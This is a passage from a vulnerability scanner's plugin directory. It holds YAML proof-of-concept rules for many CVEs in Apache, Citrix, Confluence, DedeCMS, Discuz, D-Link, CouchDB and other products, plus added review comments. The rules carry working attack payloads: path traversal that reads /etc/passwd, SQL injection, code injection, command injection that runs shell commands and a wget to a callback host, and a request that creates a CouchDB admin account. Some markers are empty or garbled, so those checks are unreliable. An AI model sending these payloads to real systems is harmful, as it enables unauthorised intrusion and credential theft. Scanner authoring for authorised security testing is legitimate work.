response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url") 7 | detail: 8 | author: JingLing(github.com/shmilylty) 9 | links: 10 | - https://s.tencent.com/research/bsafe/1156.html 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/apache-nifi-api-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-nifi-api-unauthorized-access 2 | manual: true 3 | transport: http 4 | rules: 5 | - method: GET 6 | path: /nifi-api/flow/current-user 7 | follow_redirects: false 8 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true") 9 | detail: 10 | author: wulalalaaa(https://github.com/wulalalaaa) 11 | links: 12 | - https://nifi.apache.org/docs/nifi-docs/rest-api/index.html 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/apache-ofbiz-cve-2018-8033-xxe.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-ofbiz-cve-2018-8033-xxe 2 | rules: 3 | - method: POST 4 | path: /webtools/control/xmlrpc 5 | headers: 6 | Content-Type: application/xml 7 | body: >- 8 | ]>&disclose; 9 | follow_redirects: false 10 | expression: > 11 | response.status == 200 && response.content_type.contains("text/xml") && "root:[x*]:0:0:".bmatches(response.body) 12 | detail: 13 | author: su(https://suzzz112113.github.io/#blog) 14 | links: 15 | - https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/aspcms-backend-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-aspcms-backend-leak 2 | rules: 3 | - method: GET 4 | path: /plug/oem/AspCms_OEMFun.asp 5 | expression: | 6 | 
response.status == 200 && "")) && response.body.bcontains(b"citrix") 13 | detail: 14 | author: JingLing(https://hackfun.org/) 15 | links: 16 | - https://support.citrix.com/article/CTX276688 17 | - https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/ 18 | - https://dmaasland.github.io/posts/citrix.html 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/citrix-cve-2020-8193-unauthorized.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-citrix-cve-2020-8193-unauthorized 2 | set: 3 | user: randomLowercase(8) 4 | pass: randomLowercase(8) 5 | rules: 6 | - method: POST 7 | path: "/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1" 8 | headers: 9 | Content-Type: application/xml 10 | X-NITRO-USER: '{{user}}' 11 | X-NITRO-PASS: '{{pass}}' 12 | body: 13 | follow_redirects: false 14 | expression: > 15 | response.status == 406 && "(?i)SESSID=\\w{32}".bmatches(bytes(response.headers["Set-Cookie"])) 16 | detail: 17 | author: bufsnake(https://github.com/bufsnake) 18 | links: 19 | - https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner/blob/master/scanner.py 20 | - https://blog.unauthorizedaccess.nl/2020/07/07/adventures-in-citrix-security-research.html 21 | -------------------------------------------------------------------------------- /src/plugins/pocs/citrix-xenmobile-cve-2020-8209.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-citrix-xenmobile-cve-2020-8209 2 | rules: 3 | - method: GET 4 | path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("octet-stream") && "^root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | author: B1anda0(https://github.com/B1anda0) 10 | links: 11 | - 
https://nvd.nist.gov/vuln/detail/CVE-2020-8209 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/coldfusion-cve-2010-2861-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-coldfusion-cve-2010-2861-lfi 2 | rules: 3 | - method: GET 4 | path: >- 5 | /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"rdspassword=") && response.body.bcontains(b"encrypted=") 9 | detail: 10 | version: 8.0, 8.0.1, 9.0, 9.0.1 and earlier versions 11 | author: sharecast 12 | links: 13 | - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 -------------------------------------------------------------------------------- /src/plugins/pocs/confluence-cve-2015-8399.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-confluence-cve-2015-8399 2 | rules: 3 | - method: GET 4 | path: /spaces/viewdefaultdecorator.action?decoratorName 5 | follow_redirects: false 6 | expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator") 7 | detail: 8 | author: whynot(https://github.com/notwhy) 9 | links: 10 | - https://www.anquanke.com/vul/id/1150798 -------------------------------------------------------------------------------- /src/plugins/pocs/confluence-cve-2019-3396-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-confluence-cve-2019-3396-lfi 2 | rules: 3 | - method: POST 4 | path: /rest/tinymce/1/macro/preview 5 | headers: 6 | Content-Type: "application/json" 7 | Host: localhost 8 | Referer: http://localhost 9 | body: >- 10 | 
{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"}}} 11 | follow_redirects: true 12 | expression: | 13 | response.status == 200 && response.body.bcontains(b"contextConfigLocation") 14 | detail: 15 | author: sharecast 16 | links: 17 | - https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396 -------------------------------------------------------------------------------- /src/plugins/pocs/confluence-cve-2021-26084.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-confluence-cve-2021-26084 2 | set: 3 | r1: randomInt(100000, 999999) 4 | r2: randomInt(100000, 999999) 5 | rules: 6 | - method: POST 7 | path: /pages/createpage-entervariables.action?SpaceKey=x 8 | body: | 9 | queryString=\u0027%2b%7b{{r1}}%2B{{r2}}%7d%2b\u0027 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 12 | detail: 13 | author: Loneyer(https://github.com/Loneyers) 14 | links: 15 | - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/confluence-cve-2021-26085-arbitrary-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-confluence-cve-2021-26085-arbitrary-file-read 2 | set: 3 | rand: randomLowercase(6) 4 | rules: 5 | - method: GET 6 | path: /s/{{rand}}/_/;/WEB-INF/web.xml 7 | follow_redirects: false 8 | expression: response.status == 200 && response.body.bcontains(b"Confluence") && response.body.bcontains(b"com.atlassian.confluence.setup.ConfluenceAppConfig") 9 | detail: 10 | author: wulalalaaa(https://github.com/wulalalaaa) 11 | links: 12 | - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html 13 | 
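--------------------------------------------------------------------------------
/src/plugins/pocs/consul-rexec-rce.yml:
--------------------------------------------------------------------------------
# Consul agent with remote exec left enabled. Detection only: reads the
# agent's self-description and looks for the DisableRemoteExec=false flag.
name: poc-yaml-consul-rexec-rce
rules:
  - method: GET
    path: /v1/agent/self
    # Requires both a JSON content type and the exact key/value text, so a
    # generic 200 page cannot satisfy this rule.
    expression: |
      response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"DisableRemoteExec\": false")
detail:
  author: imlonghao(https://imlonghao.com/)
  links:
    - https://www.exploit-db.com/exploits/46073
--------------------------------------------------------------------------------
/src/plugins/pocs/consul-service-rce.yml:
--------------------------------------------------------------------------------
# Consul agent with script checks enabled (either flag is sufficient).
name: poc-yaml-consul-service-rce
rules:
  - method: GET
    path: /v1/agent/self
    # FIX: `&&` binds tighter than `||`. Without the parentheses the status and
    # content-type guards applied only to the first marker, so any response
    # that merely echoed the second string (error page, proxy, WAF) matched.
    expression: |
      response.status == 200 && response.content_type.contains("json") && (response.body.bcontains(b"\"EnableScriptChecks\": true") || response.body.bcontains(b"\"EnableRemoteScriptChecks\": true"))
detail:
  author: imlonghao(https://imlonghao.com/)
  links:
    - https://www.exploit-db.com/exploits/46074
--------------------------------------------------------------------------------
/src/plugins/pocs/coremail-cnvd-2019-16798.yml:
--------------------------------------------------------------------------------
# Coremail configuration dump via the ADMIN:appState endpoint.
name: poc-yaml-coremail-cnvd-2019-16798
rules:
  - method: GET
    path: >-
      /mailsms/s?func=ADMIN:appState&dumpConfig=/
    follow_redirects: false
    # TODO(review): the marker below is an EMPTY string, and bcontains(b"") is
    # true for every body, so this rule currently reduces to `status == 200`
    # and will fire on any site. The original marker was most likely an XML
    # tag that was lost when this file was rendered; restore a real marker
    # from the config dump before relying on this POC.
    expression: >
      response.status == 200 && response.body.bcontains(bytes(""))
detail:
  author: cc_ci(https://github.com/cc8ci)
  links:
    - https://www.secpulse.com/archives/107611.html
--------------------------------------------------------------------------------
/src/plugins/pocs/couchcms-cve-2018-7662.yml:
--------------------------------------------------------------------------------
# CouchCMS path disclosure via PHP fatal errors on directly requested includes.
# Both rules must match (rules are ANDed).
name: poc-yaml-couchcms-cve-2018-7662
rules:
  - method: GET
    path: /includes/mysql2i/mysql2i.func.php
    follow_redirects: false
    expression: >
      response.status == 200 && response.body.bcontains(b"mysql2i.func.php on line 10") && response.body.bcontains(b"Fatal error: Cannot redeclare mysql_affected_rows() in")
  - method: GET
    path: /addons/phpmailer/phpmailer.php
    follow_redirects: false
    # FIX: the marker read "menber function", which PHP never emits; the
    # fatal error text is "Call to a member function ... on a non-object"
    # (PHP 5 wording - PHP 7 prints "on null" instead, so this rule is
    # PHP-5-specific).
    expression: >
      response.status == 200 && response.body.bcontains(b"phpmailer.php on line 10") && response.body.bcontains(b"Fatal error: Call to a member function add_event_listener() on a non-object in")
detail:
  author: we1x4n(https://we1x4n.github.io/)
  links:
    - https://github.com/CouchCMS/CouchCMS/issues/46
--------------------------------------------------------------------------------
/src/plugins/pocs/couchdb-cve-2017-12635.yml:
--------------------------------------------------------------------------------
# CouchDB privilege escalation: the duplicate "roles" key is parsed
# differently by the Erlang and JavaScript JSON parsers, so the validation
# sees `[]` while the stored document keeps `["_admin"]`.
#
# WARNING (operational): this POC is NOT side-effect free. On a vulnerable
# target it creates a persistent user `org.couchdb.user:{{r1}}` with the
# `_admin` role and a FIXED, publicly known password. Every vulnerable host
# scanned is left with a backdoor account. Delete the document after the
# check, or at least replace the constant password with a random one.
name: poc-yaml-couchdb-cve-2017-12635
set:
  r1: randomLowercase(32)
rules:
  - method: PUT
    path: '/_users/org.couchdb.user:{{r1}}'
    headers:
      Content-Type: application/json
      # FIX: removed the hard-coded `Content-Length: '192'`. The rendered body
      # below is 186 bytes with LF line endings (192 only with CRLF); a
      # mismatched length makes the server wait for bytes that never arrive
      # or reject the request. No other POST/PUT rule in this corpus sets it
      # by hand, so the HTTP client is expected to compute it.
    body: |-
      {
        "type": "user",
        "name": "{{r1}}",
        "roles": ["_admin"],
        "roles": [],
        "password": "fVyuyAECgYEAhgJzkPO1sTV1Dvs5bvls4tyVAsLy2I7wHKWJvJdDUpox2TnCMFT9"
      }
    follow_redirects: false
    # 201 Created plus the new document id echoed back.
    expression: |
      response.status == 201 && response.body.bcontains(bytes("org.couchdb.user:" + r1))
detail:
  author: j4ckzh0u(https://github.com/j4ckzh0u)
  links:
    - https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635
--------------------------------------------------------------------------------
/src/plugins/pocs/couchdb-unauth.yml:
--------------------------------------------------------------------------------
# CouchDB (1.x) exposing /_config without authentication. Three distinct
# config section names are required to limit false positives.
name: poc-yaml-couchdb-unauth
rules:
  - method: GET
    path: /_config
    follow_redirects: false
    expression: >
      response.status == 200 && response.body.bcontains(b"httpd_design_handlers") && response.body.bcontains(b"external_manager") && response.body.bcontains(b"replicator_manager")
detail:
  author: FiveAourThe(https://github.com/FiveAourThe)
  links:
    - https://www.seebug.org/vuldb/ssvid-91597
--------------------------------------------------------------------------------
/src/plugins/pocs/datang-ac-default-password-cnvd-2021-04128.yml:
--------------------------------------------------------------------------------
# Datang AC controller: default credentials admin/123456. The form fields
# other than user/password are URL-encoded Chinese UI labels
# ("please enter password" / "log in now") and are sent as-is.
name: poc-yaml-datang-ac-default-password-cnvd-2021-04128
rules:
  - method: POST
    path: /login.cgi
    follow_redirects: false
    body: >-
      user=admin&password1=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&password=123456&Submit=%E7%AB%8B%E5%8D%B3%E7%99%BB%E5%BD%95
    # Guarded the header lookup with `in` so a 200 without a Set-Cookie header
    # evaluates to false instead of a missing-key error (same pattern as
    # discuz-wechat-plugins-unauth). Matching responses are unaffected.
    expression: |
      response.status == 200 && "set-cookie" in response.headers && response.headers["set-cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_")

detail:
  author: B1anda0(https://github.com/B1anda0)
  links:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-04128
--------------------------------------------------------------------------------
/src/plugins/pocs/dedecms-carbuyaction-fileinclude.yml:
--------------------------------------------------------------------------------
# DedeCMS local file inclusion through the `code` cookie in carbuyaction.php.
# The first rule only confirms the endpoint answers 200; the second carries
# the actual evidence (the Cod::respond() error text).
name: poc-yaml-dedecms-carbuyaction-fileinclude
rules:
  - method: GET
    path: /plus/carbuyaction.php?dopost=return&code=../../
    headers:
      Cookie: code=alipay
    follow_redirects: true
    expression: |
      response.status == 200
  - method: GET
    path: /plus/carbuyaction.php?dopost=return&code=../../
    headers:
      Cookie: code=cod
    follow_redirects: true
    expression: |
      response.status == 200 && response.body.bcontains(bytes("Cod::respond()"))

detail:
  author: harris2015(https://github.com/harris2015)
  Affected Version: "DedeCmsV5.x"
  links:
    - https://www.cnblogs.com/milantgh/p/3615986.html
--------------------------------------------------------------------------------
/src/plugins/pocs/dedecms-cve-2018-6910.yml:
--------------------------------------------------------------------------------
# DedeCMS full-path disclosure: requesting the include directly triggers a
# PHP fatal error that contains the file name.
name: poc-yaml-dedecms-cve-2018-6910
rules:
  - method: GET
    path: /include/downmix.inc.php
    expression: |
      response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()"))
detail:
  author: PickledFish(https://github.com/PickledFish)
  links:
    - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md
--------------------------------------------------------------------------------
/src/plugins/pocs/dedecms-cve-2018-7700-rce.yml:
--------------------------------------------------------------------------------
# DedeCMS template-tag RCE via tag_test_action.php (runphp='yes').
# Affected version (per the original detail field): V5.7 SP2 release of 2018-01-09.
name: poc-yaml-dedecms-cve-2018-7700-rce
set:
  r: randomInt(2000000000, 2100000000)
rules:
  - method: GET
    # FIX: the PHP snippet was `echo md5{{r}};` (no call parentheses), which
    # PHP would print as the literal text "md5<number>", so the digest the
    # expression below waits for could never appear. `md5({{r}})` is the
    # only form consistent with the check.
    path: >-
      /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5({{r}});{/dede:field}
    follow_redirects: true
    expression: |
      response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
detail:
  author: harris2015(https://github.com/harris2015)
  Affected Version: "V5.7SP2正式版(2018-01-09)"
  links:
    - https://xz.aliyun.com/t/2224
--------------------------------------------------------------------------------
/src/plugins/pocs/dedecms-membergroup-sqli.yml:
--------------------------------------------------------------------------------
# DedeCMS 5.6/5.7 SQL injection in ajax_membergroup.php; a randomised md5
# marker is selected back so the result cannot be a cached/static page.
name: poc-yaml-dedecms-membergroup-sqli
set:
  r: randomInt(800000000, 1000000000)
rules:
  - method: GET
    path: >-
      /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{r}})+--+@`'`
    follow_redirects: true
    expression: |
      response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
detail:
  author: harris2015(https://github.com/harris2015)
  Affected Version: "5.6,5.7"
  links:
    - http://www.dedeyuan.com/xueyuan/wenti/1244.html
--------------------------------------------------------------------------------
/src/plugins/pocs/dedecms-url-redirection.yml:
--------------------------------------------------------------------------------
# DedeCMS open redirect in plus/download.php. The `link` parameter is the
# base64 of "https://www.du1x3r12.com" - a third-party domain not controlled
# by this project. Keep follow_redirects false so the scanner never contacts it.
name: poc-yaml-dedecms-url-redirection
rules:
  - method: GET
    path: >-
      /plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t
    follow_redirects: false
    # Guarded the header lookup with `in` (see discuz-wechat-plugins-unauth).
    expression: >
      response.status == 302 && "location" in response.headers && response.headers["location"] == "https://www.du1x3r12.com"
detail:
  author: cc_ci(https://github.com/cc8ci)
  Affected Version: "V5.7 sp1"
  links:
    - https://blog.csdn.net/ystyaoshengting/article/details/82734888
--------------------------------------------------------------------------------
/src/plugins/pocs/discuz-ml3x-cnvd-2019-22239.yml:
--------------------------------------------------------------------------------
# Discuz!ML 3.x RCE through the `language` cookie. Rule 1 extracts the
# site's cookie prefix into `token`; rule 2 injects PHP through the cookie
# and expects the randomised md5 marker back.
name: poc-yaml-discuz-ml3x-cnvd-2019-22239
set:
  r1: randomInt(800000000, 1000000000)
rules:
  - method: GET
    path: /forum.php
    follow_redirects: false
    expression: |
      response.status == 200
    # FIX: the named capture group had lost its name (`(?P[\w_]+)` is not
    # valid regex syntax), yet rule 2 references `{{token}}`; the group is
    # therefore restored as `token`.
    search: cookiepre = '(?P<token>[\w_]+)'
  - method: GET
    path: /forum.php
    headers:
      Cookie: "{{token}}language=sc'.print(md5({{r1}})).'"
    follow_redirects: false
    expression: |
      response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
detail:
  author: X.Yang
  Discuz_version: Discuz!ML 3.x
  links:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2019-22239
--------------------------------------------------------------------------------
/src/plugins/pocs/discuz-v72-sqli.yml:
--------------------------------------------------------------------------------
# Discuz! <= 7.2 error-based SQL injection in faq.php.
# NOTE(review): the marker is the constant md5(1234) rather than a per-scan
# random value, and the payload also pulls `mysql.user.user` into the error
# text - more than a detection needs. A randomised marker like the sibling
# rules would make the result attributable to this request.
name: poc-yaml-discuz-v72-sqli
rules:
  - method: GET
    path: >-
      /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
    follow_redirects: false
    expression: >
      response.status == 200 && response.body.bcontains(b"81dc9bdb52d04dc20036dbd8313ed055") && response.body.bcontains(b"Discuz! info: MySQL Query Error")
detail:
  author: leezp
  Affected Version: "discuz <=v7.2"
  vuln_url: "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20"
  links:
    - https://blog.csdn.net/weixin_40709439/article/details/82780606
--------------------------------------------------------------------------------
/src/plugins/pocs/discuz-wechat-plugins-unauth.yml:
--------------------------------------------------------------------------------
# Discuz! WeChat plugin: unauthenticated wxregister hands out an auth cookie
# and redirects to wsq.discuz.com. Header lookups are guarded with `in`.
name: poc-yaml-discuz-wechat-plugins-unauth
rules:
  - method: GET
    path: '/plugin.php?id=wechat:wechat&ac=wxregister'
    follow_redirects: false
    expression: |
      response.status == 302 && "set-cookie" in response.headers && response.headers["set-cookie"].contains("auth") && "location" in response.headers && response.headers["location"].contains("wsq.discuz.com")
detail:
  author: JrD
  links:
    - https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI
--------------------------------------------------------------------------------
/src/plugins/pocs/discuz-wooyun-2010-080723.yml:
--------------------------------------------------------------------------------
# Discuz! 6.x/7.x RCE via the injected $_DCACHE smilies cache (preg_replace
# with the /e modifier). NOTE(review): the target thread id 10 is hard-coded;
# the check silently fails on boards where that thread does not exist.
name: poc-yaml-discuz-wooyun-2010-080723
set:
  rand: randomInt(200000000, 210000000)
rules:
  - method: GET
    path: >-
      /viewthread.php?tid=10
    headers:
      Cookie: GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D=/.*/eui; GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D=print_r(md5({{rand}}));
    follow_redirects: false
    expression: |
      response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail:
  version: Discuz 7.x/6.x
  author: Loneyer
  links:
    - https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723
--------------------------------------------------------------------------------
/src/plugins/pocs/django-CVE-2018-14574.yml:
--------------------------------------------------------------------------------
# Django open redirect (CommonMiddleware APPEND_SLASH): a request for
# `//www.example.com` is answered with a 301 to the protocol-relative URL.
name: poc-yaml-django-CVE-2018-14574

rules:
  - method: GET
    path: //www.example.com
    follow_redirects: false
    # Guarded the header lookup with `in` (see discuz-wechat-plugins-unauth).
    expression: response.status == 301 && "location" in response.headers && response.headers['location']=="//www.example.com/"

detail:
  author: ivan
  links:
    - https://github.com/vulhub/vulhub/tree/master/django/CVE-2018-14574
--------------------------------------------------------------------------------
/src/plugins/pocs/dlink-850l-info-leak.yml:
--------------------------------------------------------------------------------
# D-Link DIR-850L: hedwig.cgi reads an arbitrary getcfg template and returns
# the admin account XML.
# TODO(review): as rendered here the body is a bare path (no XML wrapper
# although Content-Type is text/xml) and two of the markers are EMPTY strings,
# which bcontains() always accepts. Both look like XML tags lost in rendering;
# until they are restored the rule is effectively `status == 200 && xml &&
# body contains "OK"`.
name: poc-yaml-dlink-850l-info-leak
rules:
  - method: POST
    path: /hedwig.cgi
    headers:
      Content-Type: text/xml
      Cookie: uid=R8tBjwtFc8
    body: |-
      ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml
    follow_redirects: false
    expression: >
      response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"") && response.body.bcontains(b"") && response.body.bcontains(b"OK")
detail:
  author: cc_ci(https://github.com/cc8ci)
  Affected Version: "Dir-850L"
  links:
    - https://xz.aliyun.com/t/2941
--------------------------------------------------------------------------------
/src/plugins/pocs/dlink-cve-2019-16920-rce.yml:
--------------------------------------------------------------------------------
# D-Link unauthenticated command injection in the ping_test action.
# Out-of-band check: the device is made to `wget` the scanner's reverse URL,
# so this POC needs the reverse/OOB listener configured, blocks up to 5 s,
# and WRITES a file under /tmp on the device (not side-effect free).
name: poc-yaml-dlink-cve-2019-16920-rce
set:
  reverse: newReverse()
  reverseURL: reverse.url
rules:
  - method: POST
    path: /apply_sec.cgi
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: >-
      html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverseURL}}
    follow_redirects: true
    expression: |
      response.status == 200 && reverse.wait(5)
detail:
  author: JingLing(https://hackfun.org/)
  links:
    - https://www.anquanke.com/post/id/187923
    - https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3
--------------------------------------------------------------------------------
/src/plugins/pocs/dlink-cve-2019-17506.yml:
--------------------------------------------------------------------------------
# D-Link getcfg.php credential disclosure (newline-injected AUTHORIZED_GROUP).
# TODO(review): both body markers are EMPTY strings and therefore always
# match; the original XML tag names were probably lost in rendering, so the
# rule currently reduces to `status == 200 && content-type contains xml`.
name: poc-yaml-dlink-cve-2019-17506
rules:
  - method: POST
    path: /getcfg.php
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
    follow_redirects: false
    expression: >
      response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"") && response.body.bcontains(b"")
detail:
  author: l1nk3r,Huasir(https://github.com/dahua966/)
  links:
    - https://xz.aliyun.com/t/6453
--------------------------------------------------------------------------------
/src/plugins/pocs/dlink-cve-2020-25078-account-disclosure.yml:
--------------------------------------------------------------------------------
# D-Link DCS cameras: /config/getuser?index=0 returns the admin credentials
# in plain text.
name: poc-yaml-dlink-cve-2020-25078-account-disclosure
rules:
  - method: GET
    path: >-
      /config/getuser?index=0
    follow_redirects: false
    # FIX: used `response.content_type` (as every other rule in this corpus
    # does) instead of indexing `response.headers["Content-Type"]`. The other
    # rules index headers with lower-case keys, so the capitalised key was at
    # best inconsistent and at worst a missing-key error.
    expression: |
      response.status == 200 && response.content_type.contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=")

detail:
  author: kzaopa(https://github.com/kzaopa)
  links:
    - https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg
--------------------------------------------------------------------------------
/src/plugins/pocs/dlink-cve-2020-9376-dump-credentials.yml:
--------------------------------------------------------------------------------
# D-Link DIR-610 getcfg.php credential dump.
# TODO(review): two markers are EMPTY strings (always true); only "Admin"
# and the xml content type currently constrain the match - see the note in
# dlink-cve-2019-17506.
name: poc-yaml-dlink-cve-2020-9376-dump-credentials
rules:
  - method: POST
    path: /getcfg.php
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: >-
      SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
    expression: >
      response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"Admin") && response.body.bcontains(b"") && response.body.bcontains(b"")
detail:
  author: x1n9Qi8
  Affected Version: "Dlink DIR-610"
  links:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376
--------------------------------------------------------------------------------
/src/plugins/pocs/docker-api-unauthorized-rce.yml:
--------------------------------------------------------------------------------
# Docker daemon API exposed without TLS client auth. Detection only (reads
# /info); an exposed daemon is root on the host, hence the "rce" name.
name: poc-yaml-docker-api-unauthorized-rce
rules:
  - method: GET
    path: /info
    follow_redirects: false
    expression: |
      response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir")

detail:
  author: j4ckzh0u(https://github.com/j4ckzh0u)
  links:
    - https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-rce
--------------------------------------------------------------------------------
/src/plugins/pocs/docker-registry-api-unauth.yml:
--------------------------------------------------------------------------------
# Docker Registry v2 without authentication: /v2/ identifies the registry,
# /v2/_catalog listing repositories proves the catalog is readable anonymously.
name: poc-yaml-docker-registry-api-unauth
rules:
  - method: GET
    path: /v2/
    follow_redirects: false
    expression: >
      response.status == 200 && "docker-distribution-api-version" in response.headers && response.headers["docker-distribution-api-version"].contains("registry/2.0")
  - method: GET
    path: /v2/_catalog
    follow_redirects: false
    expression: >
      response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"repositories")
detail:
  author: p0wd3r
  links:
    - http://www.polaris-lab.com/index.php/archives/253/
--------------------------------------------------------------------------------
/src/plugins/pocs/dotnetcms-sqli.yml:
--------------------------------------------------------------------------------
# DotNetCMS (MSSQL) union-based injection in City_ajax.aspx. The server-side
# HashBytes('MD5', r1) rendered through fn_sqlvarbasetostr is compared with
# the scanner's own md5(r1) (hex digits; note fn_sqlvarbasetostr prefixes
# "0x", which bcontains tolerates).
name: poc-yaml-dotnetcms-sqli
set:
  r1: randomInt(800000000, 1000000000)
  r2: randomInt(1, 100)
rules:
  - method: GET
    path: /user/City_ajax.aspx
    follow_redirects: false
    expression: |
      response.status == 200
  - method: GET
    path: >-
      /user/City_ajax.aspx?CityId={{r2}}'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','{{r1}}')),2--
    follow_redirects: false
    expression: |
      response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
detail:
  Affected Version: "v1.0~v2.0"
  links:
    - https://www.cnblogs.com/rebeyond/p/4951418.html
    - http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0150742
--------------------------------------------------------------------------------
/src/plugins/pocs/draytek-cve-2020-8515.yml:
--------------------------------------------------------------------------------
# DrayTek Vigor pre-auth command injection via the keyPath login parameter.
# Executes `cat /etc/passwd`, `id` and `pwd` on the device and expects the
# passwd root line back (command execution, not just detection).
name: poc-yaml-draytek-cve-2020-8515
rules:
  - method: POST
    path: /cgi-bin/mainfunction.cgi
    headers:
      Content-Type: text/plain; charset=UTF-8
    body: >-
      action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a
    expression: >
      response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"gid") && "root:[x*]:0:0:".bmatches(response.body)
detail:
  author: Soveless(https://github.com/Soveless)
  Affected Version: "Vigor2960, Vigor300B, Vigor3900 < v1.5.1, VigorSwitch20P2121, VigorSwitch20G1280, VigorSwitch20P1280, VigorSwitch20G2280, VigorSwitch20P2280 <= v2.3.2"
  links:
    - https://github.com/imjdl/CVE-2020-8515-PoC
--------------------------------------------------------------------------------
/src/plugins/pocs/druid-monitor-unauth.yml:
--------------------------------------------------------------------------------
# Alibaba Druid monitor console reachable without authentication.
name: poc-yaml-druid-monitor-unauth
rules:
  - method: GET
    path: /druid/index.html
    expression: |
      response.status == 200 && response.body.bcontains(b"Druid Stat Index") && response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers")
detail:
  author: met7or
  links:
    - https://github.com/alibaba/druid
--------------------------------------------------------------------------------
/src/plugins/pocs/drupal-cve-2014-3704-sqli.yml:
--------------------------------------------------------------------------------
# Drupal < 7.32 "Drupalgeddon" SQL injection in the login form's array keys.
# The folded body joins the two lines with a single space ("...name[0 or
# updatexml..."). The expected marker is the constant md5(666) =
# fae0b27c451c728867a567e8c1bb4e53 surfaced through a PDOException page.
name: poc-yaml-drupal-cve-2014-3704-sqli
rules:
  - method: POST
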